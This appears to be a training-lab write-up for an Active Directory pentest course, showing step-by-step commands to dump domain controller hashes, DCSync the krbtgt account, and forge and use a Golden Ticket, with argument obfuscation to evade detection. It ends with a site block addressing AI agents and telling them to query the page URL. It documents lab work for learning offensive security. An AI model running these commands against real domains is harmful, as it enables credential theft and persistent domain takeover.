# CRTP Lab 8 ## Task 1 Extract secrets from the domain controller of dollarcorp. Since we have DA privs, we can extract all hashes on DC. Let's start a process as DA from elevated cmd of student. {% code overflow="wrap" %} ``` # Run ArgSplit for asktgt C:\Users\student372>cd \AD\Tools C:\AD\Tools>ArgSplit.bat [!] Argument Limit: 180 characters [+] Enter a string: asktgt set "z=t" set "y=g" set "x=t" set "w=k" set "v=s" set "u=a" set "Pwn=%u%%v%%w%%x%%y%%z%" C:\AD\Tools>set "z=t" C:\AD\Tools>set "y=g" C:\AD\Tools>set "x=t" C:\AD\Tools>set "w=k" C:\AD\Tools>set "v=s" C:\AD\Tools>set "u=a" C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%" # Get DA shell as svcadmin C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt ``` {% endcode %} To dump hashes: * Copy Loader from student to dcorp-dc * Spawn cmd on dcorp-dc * Set up portforward to run SafetyKatz * Finally, run SafetyKatz Note: We only get NTLM hashes using "`lsadump::lsa /patch`". {% code overflow="wrap" %} ``` # Copy Loader.exe to DC echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y # Spawn interactive shell winrs -r:dcorp-dc cmd # Set up port forwarding netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72 # ArgSplit "lsadump::lsa" # Dump hashes C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit" ``` {% endcode %} Let's use DCSync to dump both, NTLM and AES hashes. {% code overflow="wrap" %} ``` # ArgSplit to encode lsadump::dcsync C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit" ``` {% endcode %} ## Task 2 Using the secrets of krbtgt account, create a Golden ticket. Using the KRBTGT hashes, we can now perform Golden Ticket attack to maintain persistence. {% code overflow="wrap" %} ``` # ArgSplit "golden" # Forge TGT using Rubeus or SafetyKatz C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd OR C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit" ``` {% endcode %} It prints the command to recreate the ticket. ## Task 3 Use the Golden ticket to (once again) get domain admin privileges from a machine. {% code overflow="wrap" %} ``` # Use the printed command to import ticket. C:\AD\Tools\Loader.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD ``` {% endcode %} Finally we can get a shell as dcorp-dc ``` C:\Users\student372>winrs -r:dcorp-dc cmd C:\Users\Administrator>set username set username USERNAME=Administrator C:\Users\Administrator>set computername set computername COMPUTERNAME=DCORP-DC ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/persistence/golden-ticket/crtp-lab-8.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.